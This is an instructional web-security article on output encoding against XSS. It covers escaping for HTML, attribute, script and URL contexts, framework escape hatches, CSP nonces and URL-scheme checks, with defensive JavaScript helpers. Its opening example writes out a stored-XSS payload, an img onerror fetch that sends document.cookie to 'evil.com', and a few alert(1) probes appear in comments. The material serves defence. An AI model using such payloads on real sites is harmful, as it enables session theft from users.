Pattern
Difficulty Advanced

Output Encoding

Escape data properly when rendering to prevent XSS by ensuring user input is treated as data, not executable code.

By Den Odell

Problem

A user signs up with the display name <img src=x onerror="fetch('https://evil.com?c='+document.cookie)">. Nothing visibly breaks at signup. But the moment another user opens a page that renders that name into the DOM, the browser parses it as a real image tag, the onerror handler fires, and the victim’s session cookie is shipped off to an attacker’s server. They never clicked anything. That’s cross-site scripting (XSS), and it happens because data the application treated as a plain string was handed to the browser in a context where it became markup.

The danger compounds with stored XSS. When that malicious display name lands in your database, it isn’t a one-time event; it’s a payload that re-executes for every single user who loads the affected page, silently, until someone notices and scrubs the record. A single unencoded field in a comment, a bio, a product review, or an uploaded filename can compromise thousands of accounts before anyone files a bug report.

What makes this genuinely hard is that “encoding” isn’t one operation. The same string is dangerous in different ways depending on where it’s rendered. Dropped into an HTML body, < opens a tag. Dropped into an attribute value, " breaks out of the quotes. Dropped into an inline <script> block, a </script> sequence or a stray quote terminates the string and starts new code. Dropped into a URL, an & or # rewrites the query. Encode for the wrong context and you’ve left the door open while believing it’s locked.

Solution

Encode user-provided data for the specific destination context before it reaches the page. Each context has its own escaping rules. HTML body context converts < to &lt;, > to &gt;, and & to &amp; so characters render as text instead of tags. Attribute context additionally escapes quotes so input can’t break out of the attribute it sits in. JavaScript context uses JSON.stringify to produce a quoted, escaped string literal rather than concatenating raw input into code; inside an inline <script> block, also escape < (for example as \u003c), because JSON.stringify leaves a </script> sequence intact. URL context uses encodeURIComponent so query values can’t inject extra parameters or fragments.

The good news: React, Vue, and Svelte all auto-escape text bindings by default. Interpolating a value with {value} in React or Svelte, or {{ value }} in Vue, runs it through HTML encoding for you, and attribute bindings like :href or className={...} are escaped too. For the overwhelming majority of rendering, doing the safe thing requires no extra effort, which is exactly the point of a safe-by-default design. One caveat: escaping does not validate URL schemes, so a user-supplied javascript: URL bound to href still needs its scheme checked.

The risk lives in the escape hatches. Every framework offers an API that injects raw markup and skips encoding entirely: React’s dangerouslySetInnerHTML, Vue’s v-html, Svelte’s {@html}, and the DOM’s innerHTML. Developers reach for these to render trusted HTML, such as a CMS article body or sanitized rich text, but they are exactly where XSS sneaks in. Treat them as a deliberate decision, never a convenience, and never point them at user input that hasn’t been run through a dedicated sanitizer like DOMPurify first.

Output encoding is the last line of defense, not the only one. It pairs with input handling on the way in (validation and sanitization) and with a Content Security Policy that limits what injected scripts can do even if something slips through. Encoding ensures data is treated as data; the other layers reduce the blast radius if it ever isn’t.
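
As a rough illustration of the Content Security Policy layer, the sketch below builds a header value that only allows same-origin scripts plus inline scripts carrying a per-response nonce. The function name buildCsp and the exact directive set are assumptions chosen for illustration, not a recommended policy for any particular site; the nonce is expected to come from a cryptographically secure random source and to be regenerated for every response.

```javascript
// Hypothetical helper: builds a Content-Security-Policy header value.
// The nonce must be freshly generated per response by the caller.
function buildCsp(nonce) {
  // Reject anything that is not base64/base64url so the nonce
  // cannot smuggle extra source expressions into the policy.
  if (!/^[A-Za-z0-9+/_-]+={0,2}$/.test(nonce)) {
    throw new Error('nonce must be a base64 string');
  }
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`, // inline scripts need this nonce
    "object-src 'none'",
    "base-uri 'none'",
  ].join('; ');
}
```

A server would send the result as the Content-Security-Policy response header and put the same nonce on the inline scripts it trusts. An injected script without the nonce is then refused by the browser even if an encoding mistake let it into the page.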

Example

These examples show the safe-by-default text binding in each framework alongside the unsafe escape hatch you should avoid for untrusted data.

Safe Bindings vs Escape Hatches

function Comment({ body, authorUrl }) {
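  // Safe: React escapes interpolated text and attribute values by default.
  // A body of "<script>alert(1)</script>" renders as visible text.
  // Escaping does not check URL schemes, so validate a user-supplied
  // authorUrl (http/https only) before rendering it.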
  return (
    <article>
      <a href={authorUrl}>Author</a>
      <p>{body}</p>
    </article>
  );
}

// Unsafe: dangerouslySetInnerHTML skips all encoding.
// Only use with sanitized HTML from a trusted source.
function RichComment({ trustedHtml }) {
  return <p dangerouslySetInnerHTML={{ __html: trustedHtml }} />;
}
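
Attribute escaping does nothing for a value like javascript:alert(1), because it contains no characters that HTML escaping changes. One possible way to guard an href such as authorUrl is a scheme allowlist. The sketch below is a minimal version under stated assumptions: safeHref, ALLOWED_PROTOCOLS, the '#' fallback, and the placeholder base URL are all hypothetical names and choices, not part of any framework.

```javascript
// Hypothetical helper: returns the URL only if its scheme is on an allowlist.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

function safeHref(value, fallback = '#') {
  try {
    // The base lets relative URLs such as "/users/42" parse.
    // It is a placeholder and never appears in the returned value.
    const url = new URL(String(value), 'https://example.invalid');
    return ALLOWED_PROTOCOLS.has(url.protocol) ? String(value) : fallback;
  } catch {
    return fallback; // not parseable as a URL at all
  }
}

// Possible usage in a component: <a href={safeHref(authorUrl)}>Author</a>
```

Parsing with the URL constructor rather than matching on a prefix means mixed case and leading whitespace (" JaVaScRiPt:...") are normalized before the scheme is compared.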

Context-Aware Encoding Helper

When you must build markup or URLs by hand, encode explicitly for the context the value lands in. HTML text needs entity escaping; a value going into a URL needs encodeURIComponent:

// Escape for HTML body and quoted attribute contexts.
// Replace & first so later replacements aren't double-encoded.
function encodeHTML(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Build a safe link: escape the text for HTML, encode the query for URLs.
function searchLink(query) {
  const href = `/search?q=${encodeURIComponent(query)}`;
  return `<a href="${encodeHTML(href)}">${encodeHTML(query)}</a>`;
}

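// JavaScript context: never concatenate raw input into code.
// JSON.stringify quotes and escapes the string but leaves "<" intact,
// so also escape "<" to stop "</script>" from closing the block early.
function inlineScript(message) {
  const literal = JSON.stringify(String(message)).replace(/</g, '\\u003c');
  return `<script>showToast(${literal})<\/script>`;
}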
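
If hand-built markup is unavoidable, one way to make the encoding hard to forget is a tagged template that escapes every interpolated value. This is a minimal sketch, not a templating library: the names html, escapeHtml, and HTML_ENTITIES are hypothetical, and it only covers HTML body and quoted attribute contexts. Values destined for URLs or inline scripts still need their own encoding.

```javascript
// Hypothetical lookup table for the five characters escaped in HTML contexts.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// A single pass over the string, so "&" is never encoded twice.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Tagged template: literal parts pass through untouched,
// every interpolated value is escaped.
function html(strings, ...values) {
  return strings.reduce(
    (out, part, i) =>
      out + part + (i < values.length ? escapeHtml(values[i]) : ''),
    ''
  );
}

const displayName = '<img src=x onerror="alert(1)">';
const markup = html`<p title="${displayName}">Hello, ${displayName}</p>`;
// markup now contains the name as inert text in both positions.
```

The design choice here is that the author of the template writes trusted literal markup, while anything arriving through ${...} is treated as data by default.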

Benefits

  • Neutralizes XSS at the rendering boundary by guaranteeing user data is treated as data, not executable code.
  • Works as a last line of defense that still holds even when input validation or sanitization upstream misses something.
  • Framework auto-escaping makes the safe path the default path, so most rendering is protected with zero extra code.
  • Context-specific encoding covers the main output surfaces: HTML bodies, attributes, inline scripts, and URLs.
  • Defends against stored XSS, where a single unencoded record would otherwise re-execute for every viewer.
  • Pairs cleanly with defense-in-depth layers like Content Security Policy and a sanitizer for the rare cases you must render real HTML.
  • Built-in browser APIs like textContent and encodeURIComponent handle the heavy lifting without third-party dependencies.

Tradeoffs

  • Correctness depends on the context: encoding for HTML when the value lands in a URL or a script offers no protection and gives a false sense of safety.
  • Applying encoding twice double-encodes the data, so < becomes &amp;lt; and renders literally on screen as a visible bug.
  • Hand-rolled HTML encoders miss edge cases (unquoted attributes, javascript: URLs, mismatched character sets); a vetted library is safer for anything non-trivial.
  • The escape hatches (dangerouslySetInnerHTML, v-html, {@html}, innerHTML) silently bypass all encoding, and one careless use reopens the vulnerability.
  • Rich text that must contain real HTML can’t be solved by encoding alone and requires a dedicated sanitizer such as DOMPurify.
  • Encoding is not a substitute for input handling or CSP; relying on it as the only defense leaves you brittle.
  • Reviewing for missed encoding across a large codebase is tedious, since the dangerous path looks almost identical to the safe one.

Summary

Output encoding ensures user input is rendered as inert text by escaping it for the exact context it lands in, whether HTML body, attribute, JavaScript, or URL. Lean on framework auto-escaping for the common case, treat every escape hatch as a deliberate decision backed by sanitization, and pair encoding with input handling and a Content Security Policy. It is the last line of defense against XSS, and it only works when applied correctly for each context.
